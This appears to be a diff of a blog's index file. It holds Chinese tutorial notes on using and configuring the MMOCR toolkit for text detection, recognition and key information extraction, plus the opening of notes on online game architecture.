    $$\left.\mathrm{lev}{a,b}(i,j)=\begin{cases}\max(i,j)\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\ \ \quad\mathrm{if~min}(i,j)=0\\\min\begin{cases}\operatorname{lev}{a,b}(i-1,j)+1\\operatorname{lev}{a,b}(i,j-1)+1\quad\quad\quad\quad\quad\mathrm{otherwise}\\operatorname{lev}{a,b}(i-1,j-1)+1_{(a_i\neq b_j)}\end{cases}\end{cases}\right.$$

    webp

    webp

    ​MMOCR 中集成了各种评估指标。

    2

    ​从 TommyZihao/MMOCR_tutorials: Jupyter notebook tutorials for MMOCR (github.com) 获取文件。

    webp

    ​必须完成 A 才可以完成下面的内容!

    A 安装配置 MMOCR

    ​虚拟环境安装 jupyter notebook:在 conda 创建的虚拟环境中安装 jupyter 以及使用_conda 虚拟环境怎么连接 jupyter-CSDN 博客

    ​安装 MMOCR:[Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding | Zi-Zi’s Journey](/2024/05/30/Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding/)

    ​检查安装成功:

    # 检查 Pytorch
    import torch, torchvision
    print('Pytorch 版本', torch.__version__)
    print('CUDA 是否可用',torch.cuda.is_available())
    Pytorch 版本 1.13.1+cu117
    CUDA 是否可用 True
    # 检查 mmcv
    import mmcv
    from mmcv.ops import get_compiling_cuda_version, get_compiler_version
    print('MMCV 版本', mmcv.__version__)
    print('CUDA 版本', get_compiling_cuda_version())
    print('编译器版本', get_compiler_version())
    MMCV 版本 2.1.0
    CUDA 版本 11.7
    编译器版本 MSVC 192930148
    # 检查 mmocr
    import mmocr
    print('mmocr 版本', mmocr.__version__)
    mmocr 版本 1.0.1

    B1 预训练模型预测-文本识别

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入模型,实例化 MMOCRInferencer,rec='svtr-small' 使用 SVTR 模型进行文本识别:mmocr/configs/textrecog/svtr at main · open-mmlab/mmocr (github.com)

    ​下载 https://download.openmmlab.com/mmocr/textrecog/svtr/svtr-small_20e_st_mj/svtr-small_20e_st_mj-35d800d6.pth 并放到合适位置,使用 rec_weights 设定模型位置(如果没有设定,则它会自动下载到一个地方)

    infer = MMOCRInferencer(rec='svtr-small', rec_weights='./models/svtr-small_20e_st_mj-35d800d6.pth')
    Loads checkpoint by local backend from path: ./models/svtr-small_20e_st_mj-35d800d6.pth

    ​载入预测图像,就决定是你了:

    png

    ​场景文本识别模型只支持裁剪出文本区域的小图的识别。

    img_path = './demo/ILoveGZ.png'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测:

    result = infer(img_path, save_vis=True, return_vis=True)

    ​解析预测结果-文本内容及置信度

    result.keys()
    dict_keys(['predictions', 'visualization'])
    result['predictions']
    [{'rec_texts': ['igz'], 'rec_scores': [0.9166250427563986]}]

    ​解析预测结果-可视化:

    plt.imshow(result['visualization'][0])
    plt.show()

    png

    B2 预训练模型预测-文字区域检测

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入模型,实例化 MMOCRInferencer,det='textsnake' 使用 Textsnake 模型进行文本识别:[文本检测模型 — MMOCR 1.0.1 文档](https://github.com/open-mmlab/mmocr/tree/main/configs/textrecog/svtr)。

    ​下载 https://download.openmmlab.com/mmocr/textdet/textsnake/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth 并放到合适位置,使用 rec_weights 设定模型位置(如果没有设定,则它会自动下载到一个地方)

    infer = MMOCRInferencer(det='textsnake', det_weights='./models/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth')

    ​载入预测图像,就决定是你了:

    jpg

    img_path = './demo/HBU.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测:

    result = infer(img_path, return_vis=True)

    ​解析预测结果-文字区域及置信度:

    result.keys()
    dict_keys(['predictions', 'visualization'])

    ​解析预测结果-文字区域可视化:

    plt.imshow(result['visualization'][0])
    plt.show()

    png


    ​也可自行加载配置文件(Method)和对应的模型(Model):

    ​从这里下载:文本检测模型 — MMOCR 1.0.1 文档

    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py', det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth')
    Loads checkpoint by local backend from path: ./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth

    ​预测结果虽然是长方形,但是似乎是检测到了弯曲文本,长方形是经过处理后得到的:

    png


    ​像如下模型:

    infer = MMOCRInferencer(det='dbnet')
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth

    ​对于弯曲文本,则检测失败:

    png

    B3 预训练模型预测-端到端 OCR

    ​相当于对一张图片先进行场景文本检测,再进行场景文本识别

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入场景文本检测模型:DBNet 以及场景文本识别模型:svtr-small

    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py',
    det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth',
    rec='svtr-small')

    ​载入预测图像,就决定是你了:

    jpg

    img_path = './demo/TJ.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测并获得结果:

    result = infer(img_path, save_vis=True, return_vis=True)
    result['predictions']
    [{'rec_texts': ['scotland<UKN>s',
    'cotland<UKN>s',
    'scotland<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'shop',
    'whisky',
    'cadenhead',
    'style<UKN>',
    '<UKN>town',
    'italian'],
    'rec_scores': [0.977949458360672,
    ...
    0.9994089433125087],
    'det_polygons': [[759.0371750764526,
    505.635521930197,
    759.5478147298675,
    494.91445790166443,
    809.203618756371,
    497.2781902810802,
    808.6929791029562,
    507.99925430961275],
    ...
    [228.83700465086648,
    339.75968070652175,
    231.53506466615698,
    289.6377231763757,
    546.131936480632,
    306.560987389606,
    543.4338764653415,
    356.6829250169837]],
    'det_scores': [0.579411506652832,
    ...
    0.8963190913200378]}]

    ​得到了文本实例、文本范围以及相应的置信度。

    ​可视化 OCR 结果(可以从 results/vis/ 文件夹下看到):

    jpg

    ​直接本地保存!

    import numpy as np
    from PIL import Image

    Image.fromarray(result['visualization'][0]).save('output_image.png')

    B4 预训练模型预测-OCR 下游任务之 KIE

    ​KIE 即 Key Information Extraction,旨在从图像(或文本)中提取出关键信息。这里 MMOCR 选用了一个 SDMGR 算法,用于发票信息提取。

    jpeg

    ​一阵操作:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    infer = MMOCRInferencer(det='textsnake', rec='svtr-small', kie='SDMGR')
    img_path = './demo/demo_kie.jpeg'
    img_bgr = cv2.imread(img_path)

    result = infer(img_path, save_vis=True, return_vis=True)

    plt.imshow(result['visualization'][0])
    plt.show()

    jpg

    ​感觉这个算法就是将场景文本检测的结果出的框框再进行一个分类操作。

    jpg

    ​对自己的图片似乎也能识别出部分信息。


    ​之后简单介绍了一下场景文本检测和场景文本识别的模型:

    webpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebp
    ## 3

    【C1】训练自己的文本识别模型

    ​读取训练用的配置文件:

    from mmengine import Config

    cfg = Config.fromfile('./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py')

    ​配置文件及解析:

    ​这段 Python 代码主要用于配置文本检测模型的训练和测试管道,通常在深度学习框架(如 MMDetection 或类似项目)中使用。以下是对代码各部分的详细解释:

    _base_ = [
    '_base_dbnet_resnet18_fpnc.py', # 基础模型配置文件
    '../_base_/datasets/totaltext.py', # 数据集配置文件
    '../_base_/default_runtime.py', # 默认运行时配置
    '../_base_/schedules/schedule_sgd_1200e.py', # 学习率调度配置
    ]
    • _base_ 列表包含几个基础配置文件的路径,这些文件定义了模型结构、数据集、运行时设置和训练计划等。
    train_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(
    type='LoadOCRAnnotations',
    with_polygon=True,
    with_bbox=True,
    with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
    type='TorchVisionWrapper',
    op='ColorJitter',
    brightness=32.0 / 255,
    saturation=0.5),
    dict(
    type='ImgAugWrapper',
    args=[['Fliplr', 0.5],
    dict(cls='Affine', rotate=[-10, 10]), ['Resize', [0.5, 3.0]]]),
    dict(type='RandomCrop', min_side_ratio=0.1),
    dict(type='Resize', scale=(640, 640), keep_ratio=True),
    dict(type='Pad', size=(640, 640)),
    dict(
    type='PackTextDetInputs',
    meta_keys=('img_path', 'ori_shape', 'img_shape'))
    ]
    • train_pipeline 定义了一系列处理步骤,用于训练数据的预处理:

      • 加载图像:从文件中读取图像,并忽略方向。

      • 加载 OCR 注释:加载与文本检测相关的信息(多边形、边界框和标签)。

      • 修复无效多边形:确保多边形至少包含 4 个顶点。

      • 颜色抖动:随机调整图像的亮度和饱和度,增强训练数据的多样性。

      • 图像增强:包括随机翻转、旋转和缩放。

      • 随机裁剪:根据最小边比进行随机裁剪。

      • 调整大小:将图像调整为 640 x 640 的大小,保持比例。

      • 填充:如果图像小于 640 x 640,则填充至该尺寸。

      • 打包输入:将处理后的图像和元数据打包成模型输入格式。

    test_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(type='Resize', scale=(1333, 736), keep_ratio=True),
    dict(
    type='LoadOCRAnnotations',
    with_polygon=True,
    with_bbox=True,
    with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
    type='PackTextDetInputs',
    meta_keys=('img_path', 'ori_shape', 'img_shape', 'scale_factor'))
    ]
    • test_pipelinetrain_pipeline 类似,但针对测试阶段进行了调整:

      • 图像被调整为 1333 x 736 的大小。

      • 同样加载 OCR 注释并修复无效多边形。

    # dataset settings
    totaltext_textdet_train = _base_.totaltext_textdet_train
    totaltext_textdet_test = _base_.totaltext_textdet_test
    totaltext_textdet_train.pipeline = train_pipeline
    totaltext_textdet_test.pipeline = test_pipeline
    • 从基础配置中获取训练和测试数据集,并为它们指定相应的处理管道。
    train_dataloader = dict(
    batch_size=16,
    num_workers=16,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=True),
    dataset=totaltext_textdet_train)

    val_dataloader = dict(
    batch_size=1,
    num_workers=1,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=False),
    dataset=totaltext_textdet_test)

    test_dataloader = val_dataloader
    • train_dataloaderval_dataloader 定义了训练和验证的数据加载器:

      • batch_size:每个批次的样本数量(训练为 16,验证为 1)。

      • num_workers:用于数据加载的工作线程数。

      • pin_memory:是否将数据加载到固定内存中,以加快 GPU 训练。

      • persistent_workers:在数据加载过程中保持工作线程持续运行。

      • sampler:数据的采样方式(训练时打乱顺序,验证时不打乱)。

    auto_scale_lr = dict(base_batch_size=16)
    • 配置自动缩放学习率的选项,以便根据基础批次大小动态调整学习率。
    ]]>
    + 视频

    课程

    1

    文本识别 OCR 神器 MMOCR【OpenMMLab】

    webp

    OpenMMLab 是一个开源人工智能算法体系,涵盖了多种领域的多种人工智能算法的开源实现。

    webp

    open-mmlab/mmocr: OpenMMLab Text Detection, Recognition and Understanding Toolbox (github.com) 是 OpenMMLab 下的一个用于 OCR 领域的工具包。包含如下功能:

    • 文本区域检测
    • 文本内容识别
    • 关键信息提取

    webp

    ​课程所包含的代码实战教程。

    webp

    webp

    ​课程中将基于 TextSnake 给文字区域打马赛克。

    webp

    webp

    webp

    webp

    OCR 即光学字符识别,包含文本区域检测文本内容识别关键信息提取

    webp

    ​对于文本识别,又分为文档文本识别场景文本识别

    webp

    ​文本图像可能存在噪音、复杂背景、多语种、倾斜、弯曲、多形状和多种字体等属性,是 OCR 的难点与挑战。

    webp

    ​一般的 OCR 系统流程分为两种:

    • 两部方法
      • 文本区域检测-裁剪出文本区域-文本内容识别
    • 端到端方法
      • 一个统一网络同时完成文本检测和文本识别两个任务

    学会 MMOCR 能做什么

    webp

    webp

    webp

    webp

    webp

    ​清华本科特奖的一个项目。

    webp

    webp

    关键信息提取是 OCR 的下游任务之一。

    webp

    webp

    开源 OCR 算法库:MMOCR

    webp

    ​上述下游任务的实现有些需要调用第三方 API,如果我们想使用自己的数据集进行训练、无限量地使用等,开源的 OCR 算法库是一个好的解决方案。

    webp

    ​MMOCR 集成了若干顶会所提出的前沿算法。

    webp

    ​各种算法的简介和使用方法可以在官方文档中找到。

    webp

    ​MMOCR 所包含的文本区域检测算法:

    • MaskRCNN
    • PAN
    • PSENet
    • DB
    • TextSnake
    • DRRG
    • FCENet

    webp

    ​MMOCR 所包含的文本内容识别算法:

    • CRNN
    • Robust
    • Scanner
    • SAR
    • SegOCR
    • Transformer
    • ABINet
    • SATRN

    webp

    webp

    ​MMOCR 包含的 OCR 下游任务——Text Understanding 文本内容理解算法:

    • Key Information Extraction: SDMG-R 关键信息提取
    • Named Entity Recognition: Bert-softmax 命名实体识别

    webp

    ​MMOCR 依赖于 MMDetection 和 MMCV。

    webp

    ​MMOCR 具有模块化设计。

    webp

    webp

    ​MMOCR 所包含的功能:

    • 数据集
      • 常用 OCR 数据集及格式转换工具
    • 训练
      • 单机训练
      • 多机训练
      • 集群训练
      • Slurm 调度器
    • 测试
      • 主流性能评估指标
      • FLOPS 评估
      • 速度评估
    • 可视化
      • 文本检测
      • 文本识别
      • 关键信息提取
    • 部署(便于部署到实际应用中)
      • 导出为 ONNX
      • ONNX 转 TensorRT

    webp

    ​文本区域检测算法的部署,在 OpenVino 中实时调用摄像头进行场景文本检测。

    常用 OCR 数据集和算法评估指标

    webp

    ​常用的文本检测和文本识别的数据集。

    webp

    ​用于场景文本识别的数据集 MJSynth,合成图片背景相对简单。

    webp

    webp

    webp

    webp

    ​数据集由图像和标注两部分组成,对文本检测而言,它的标注范式与图像分割非常类似,都是用多段线去包络一个文字区域。

    webp

    ​对于文本内容识别的任务,标注包含文件名和对应的文字内容。

    webp

    置信度(confidence)
    模型在检测过程中,一个目标上可能会出现多个框,每一个框会对应一个 confidence,confidence 阈值就是之后计算 TP,FP,TN,FN 等参数的界限;
    交并比(IOU)
    计算模型预测出的框和标签中标注的框的 IOU,IOU 用于判定目标是真目标还是假目标,大于 IOU 阈值的框会认定为 True,小于 IOU 阈值的检测框会认定为 False;
    计算 TP,FP,TN,FN

    • TP:大于 IOU 阈值且大于 confidence 阈值(实际是正样本,判定为正样本);(检测对了)
    • FP:小于 IOU 阈值且大于 confidence 阈值(实际是负样本,判定为正样本);(检测错了)
    • TN:小于 IOU 阈值且小于 confidence 阈值(实际是负样本,判定为负样本);(不用于计算)
    • FN:大于 IOU 阈值且小于 confidence 阈值(实际是正样本,判定为负样本);(没检测出来)
    • 文本检测

      • 基于 IoU 计算(预测区域和标记区域的交并集)
        • Precision: TP / (TP + FP) 查准率
        • Recall: TP / (TP + FN) 查全率,TP + FN 为所有正样本的数量
        • hmean:P 与 R 的调和平均数
    • 文本内容识别

      • 基于混淆矩阵计算(本质上是一个分类问题)
        • Accuracy
        • Precision
        • Recall
      • 基于编辑距离/莱文斯坦距离(Levenshtein)计算
        • 1-N.E.D

    $$\left.\mathrm{lev}{a,b}(i,j)=\begin{cases}\max(i,j)\quad\quad\quad\quad\quad\quad\quad\quad\quad\quad\ \ \quad\mathrm{if~min}(i,j)=0\\\min\begin{cases}\operatorname{lev}{a,b}(i-1,j)+1\\operatorname{lev}{a,b}(i,j-1)+1\quad\quad\quad\quad\quad\mathrm{otherwise}\\operatorname{lev}{a,b}(i-1,j-1)+1_{(a_i\neq b_j)}\end{cases}\end{cases}\right.$$

    webp

    webp

    ​MMOCR 中集成了各种评估指标。

    2

    ​从 TommyZihao/MMOCR_tutorials: Jupyter notebook tutorials for MMOCR (github.com) 获取文件。

    webp

    ​必须完成 A 才可以完成下面的内容!

    A 安装配置 MMOCR

    ​虚拟环境安装 jupyter notebook:在 conda 创建的虚拟环境中安装 jupyter 以及使用_conda 虚拟环境怎么连接 jupyter-CSDN 博客

    ​安装 MMOCR:[Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding | Zi-Zi’s Journey](/2024/05/30/Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding/)

    ​检查安装成功:

    1
    2
    3
    4
    # 检查 Pytorch
    import torch, torchvision
    print('Pytorch 版本', torch.__version__)
    print('CUDA 是否可用',torch.cuda.is_available())
    1
    2
    Pytorch 版本 1.13.1+cu117
    CUDA 是否可用 True
    1
    2
    3
    4
    5
    6
    # 检查 mmcv
    import mmcv
    from mmcv.ops import get_compiling_cuda_version, get_compiler_version
    print('MMCV 版本', mmcv.__version__)
    print('CUDA 版本', get_compiling_cuda_version())
    print('编译器版本', get_compiler_version())
    1
    2
    3
    MMCV 版本 2.1.0
    CUDA 版本 11.7
    编译器版本 MSVC 192930148
    1
    2
    3
    # 检查 mmocr
    import mmocr
    print('mmocr 版本', mmocr.__version__)
    1
    mmocr 版本 1.0.1

    B1 预训练模型预测-文本识别

    ​导入工具包:

    1
    2
    3
    4
    5
    6
    from mmocr.apis import MMOCRInferencer

    import cv2

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入模型,实例化 MMOCRInferencer,rec='svtr-small' 使用 SVTR 模型进行文本识别:mmocr/configs/textrecog/svtr at main · open-mmlab/mmocr (github.com)

    ​下载 https://download.openmmlab.com/mmocr/textrecog/svtr/svtr-small_20e_st_mj/svtr-small_20e_st_mj-35d800d6.pth 并放到合适位置,使用 rec_weights 设定模型位置(如果没有设定,则它会自动下载到一个地方)

    1
    infer = MMOCRInferencer(rec='svtr-small', rec_weights='./models/svtr-small_20e_st_mj-35d800d6.pth')
    1
    Loads checkpoint by local backend from path: ./models/svtr-small_20e_st_mj-35d800d6.pth

    ​载入预测图像,就决定是你了:

    png

    ​场景文本识别模型只支持裁剪出文本区域的小图的识别。

    1
    2
    3
    4
    img_path = './demo/ILoveGZ.png'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测:

    1
    result = infer(img_path, save_vis=True, return_vis=True)

    ​解析预测结果-文本内容及置信度

    1
    result.keys()
    1
    dict_keys(['predictions', 'visualization'])
    1
    result['predictions']
    1
    [{'rec_texts': ['igz'], 'rec_scores': [0.9166250427563986]}]

    ​解析预测结果-可视化:

    1
    2
    plt.imshow(result['visualization'][0])
    plt.show()

    png

    B2 预训练模型预测-文字区域检测

    ​导入工具包:

    1
    2
    3
    4
    5
    6
    7
    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入模型,实例化 MMOCRInferencer,det='textsnake' 使用 Textsnake 模型进行文本识别:[文本检测模型 — MMOCR 1.0.1 文档](https://github.com/open-mmlab/mmocr/tree/main/configs/textrecog/svtr)。

    ​下载 https://download.openmmlab.com/mmocr/textdet/textsnake/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth 并放到合适位置,使用 rec_weights 设定模型位置(如果没有设定,则它会自动下载到一个地方)

    1
    infer = MMOCRInferencer(det='textsnake', det_weights='./models/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth')

    ​载入预测图像,就决定是你了:

    jpg

    1
    2
    3
    4
    img_path = './demo/HBU.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测:

    1
    result = infer(img_path, return_vis=True)

    ​解析预测结果-文字区域及置信度:

    1
    result.keys()
    1
    dict_keys(['predictions', 'visualization'])

    ​解析预测结果-文字区域可视化:

    1
    2
    plt.imshow(result['visualization'][0])
    plt.show()

    png


    ​也可自行加载配置文件(Method)和对应的模型(Model):

    ​从这里下载:文本检测模型 — MMOCR 1.0.1 文档

    1
    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py', det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth')
    1
    Loads checkpoint by local backend from path: ./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth

    ​预测结果虽然是长方形,但是似乎是检测到了弯曲文本,长方形是经过处理后得到的:

    png


    ​像如下模型:

    1
    infer = MMOCRInferencer(det='dbnet')
    1
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth

    ​对于弯曲文本,则检测失败:

    png

    B3 预训练模型预测-端到端 OCR

    ​相当于对一张图片先进行场景文本检测,再进行场景文本识别

    ​导入工具包:

    1
    2
    3
    4
    5
    6
    7
    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入场景文本检测模型:DBNet 以及场景文本识别模型:svtr-small

    1
    2
    3
    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py',
    det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth',
    rec='svtr-small')

    ​载入预测图像,就决定是你了:

    jpg

    1
    2
    3
    4
    img_path = './demo/TJ.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测并获得结果:

    1
    result = infer(img_path, save_vis=True, return_vis=True)
    1
    result['predictions']
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    [{'rec_texts': ['scotland<UKN>s',
    'cotland<UKN>s',
    'scotland<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'shop',
    'whisky',
    'cadenhead',
    'style<UKN>',
    '<UKN>town',
    'italian'],
    'rec_scores': [0.977949458360672,
    ...
    0.9994089433125087],
    'det_polygons': [[759.0371750764526,
    505.635521930197,
    759.5478147298675,
    494.91445790166443,
    809.203618756371,
    497.2781902810802,
    808.6929791029562,
    507.99925430961275],
    ...
    [228.83700465086648,
    339.75968070652175,
    231.53506466615698,
    289.6377231763757,
    546.131936480632,
    306.560987389606,
    543.4338764653415,
    356.6829250169837]],
    'det_scores': [0.579411506652832,
    ...
    0.8963190913200378]}]

    ​得到了文本实例、文本范围以及相应的置信度。

    ​可视化 OCR 结果(可以从 results/vis/ 文件夹下看到):

    jpg

    ​直接本地保存!

    1
    2
    3
    4
    import numpy as np
    from PIL import Image

    Image.fromarray(result['visualization'][0]).save('output_image.png')

    B4 预训练模型预测-OCR 下游任务之 KIE

    ​KIE 即 Key Information Extraction,旨在从图像(或文本)中提取出关键信息。这里 MMOCR 选用了一个 SDMGR 算法,用于发票信息提取。

    jpeg

    ​一阵操作:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    infer = MMOCRInferencer(det='textsnake', rec='svtr-small', kie='SDMGR')
    img_path = './demo/demo_kie.jpeg'
    img_bgr = cv2.imread(img_path)

    result = infer(img_path, save_vis=True, return_vis=True)

    plt.imshow(result['visualization'][0])
    plt.show()

    jpg

    ​感觉这个算法就是将场景文本检测的结果出的框框再进行一个分类操作。

    jpg

    ​对自己的图片似乎也能识别出部分信息。


    ​之后简单介绍了一下场景文本检测和场景文本识别的模型:

    webpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebpwebp
    ## 3

    【C1】训练自己的文本识别模型

    ​读取训练用的配置文件:

    1
    2
    3
    from mmengine import Config

    cfg = Config.fromfile('./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py')

    ​配置文件及解析:

    ​这段 Python 代码主要用于配置文本检测模型的训练和测试管道,通常在深度学习框架(如 MMDetection 或类似项目)中使用。以下是对代码各部分的详细解释:

    1
    2
    3
    4
    5
    6
    _base_ = [
    '_base_dbnet_resnet18_fpnc.py', # 基础模型配置文件
    '../_base_/datasets/totaltext.py', # 数据集配置文件
    '../_base_/default_runtime.py', # 默认运行时配置
    '../_base_/schedules/schedule_sgd_1200e.py', # 学习率调度配置
    ]
    • _base_ 列表包含几个基础配置文件的路径,这些文件定义了模型结构、数据集、运行时设置和训练计划等。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    train_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(
    type='LoadOCRAnnotations',
    with_polygon=True,
    with_bbox=True,
    with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
    type='TorchVisionWrapper',
    op='ColorJitter',
    brightness=32.0 / 255,
    saturation=0.5),
    dict(
    type='ImgAugWrapper',
    args=[['Fliplr', 0.5],
    dict(cls='Affine', rotate=[-10, 10]), ['Resize', [0.5, 3.0]]]),
    dict(type='RandomCrop', min_side_ratio=0.1),
    dict(type='Resize', scale=(640, 640), keep_ratio=True),
    dict(type='Pad', size=(640, 640)),
    dict(
    type='PackTextDetInputs',
    meta_keys=('img_path', 'ori_shape', 'img_shape'))
    ]
    • train_pipeline 定义了一系列处理步骤,用于训练数据的预处理:

      • 加载图像:从文件中读取图像,并忽略方向。

      • 加载 OCR 注释:加载与文本检测相关的信息(多边形、边界框和标签)。

      • 修复无效多边形:确保多边形至少包含 4 个顶点。

      • 颜色抖动:随机调整图像的亮度和饱和度,增强训练数据的多样性。

      • 图像增强:包括随机翻转、旋转和缩放。

      • 随机裁剪:根据最小边比进行随机裁剪。

      • 调整大小:将图像调整为 640 x 640 的大小,保持比例。

      • 填充:如果图像小于 640 x 640,则填充至该尺寸。

      • 打包输入:将处理后的图像和元数据打包成模型输入格式。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    test_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(type='Resize', scale=(1333, 736), keep_ratio=True),
    dict(
    type='LoadOCRAnnotations',
    with_polygon=True,
    with_bbox=True,
    with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
    type='PackTextDetInputs',
    meta_keys=('img_path', 'ori_shape', 'img_shape', 'scale_factor'))
    ]
    • test_pipelinetrain_pipeline 类似,但针对测试阶段进行了调整:

      • 图像被调整为 1333 x 736 的大小。

      • 同样加载 OCR 注释并修复无效多边形。

    1
    2
    3
    4
    5
    # dataset settings
    totaltext_textdet_train = _base_.totaltext_textdet_train
    totaltext_textdet_test = _base_.totaltext_textdet_test
    totaltext_textdet_train.pipeline = train_pipeline
    totaltext_textdet_test.pipeline = test_pipeline
    • 从基础配置中获取训练和测试数据集,并为它们指定相应的处理管道。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    train_dataloader = dict(
    batch_size=16,
    num_workers=16,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=True),
    dataset=totaltext_textdet_train)

    val_dataloader = dict(
    batch_size=1,
    num_workers=1,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=False),
    dataset=totaltext_textdet_test)

    test_dataloader = val_dataloader
    • train_dataloaderval_dataloader 定义了训练和验证的数据加载器:

      • batch_size:每个批次的样本数量(训练为 16,验证为 1)。

      • num_workers:用于数据加载的工作线程数。

      • pin_memory:是否将数据加载到固定内存中,以加快 GPU 训练。

      • persistent_workers:在数据加载过程中保持工作线程持续运行。

      • sampler:数据的采样方式(训练时打乱顺序,验证时不打乱)。

    1
    auto_scale_lr = dict(base_batch_size=16)
    • 配置自动缩放学习率的选项,以便根据基础批次大小动态调整学习率。
    ]]>
    @@ -960,7 +960,7 @@ /posts/GAMES104-Online%20Gaming%20Architecture/ - 资源

    课程

    第十八节:网络游戏的架构基础

    Online Gaming Architecture: Fundamentals

    网络游戏架构

    PLAY ANYWHERE WITH ANYONE

    与任何人随时随地玩游戏

    Game developers have never stopped exploring multiplayer online gaming

    游戏开发商从未停止探索多人在线游戏

    Challenges in Multiplayer Online Gaming

    多人联机游戏的挑战

    Consistency

    一致性

    • Network Synchronization

      网络同步

    Reliability

    可靠性

    • Network Latency

      网络延迟

    • Drop and Reconnect

      断线重连

    Security

    安全性

    • Cheats

      作弊

    • Accounts Hacked

      账户被黑客攻击

    Diversities

    多样性

    • Cross-Play

      交叉游戏

    • Rapid iteration

      快速迭代

    • Multiple Game Systems

      多游戏系统

    Complexities

    复杂性

    • High Concurrency
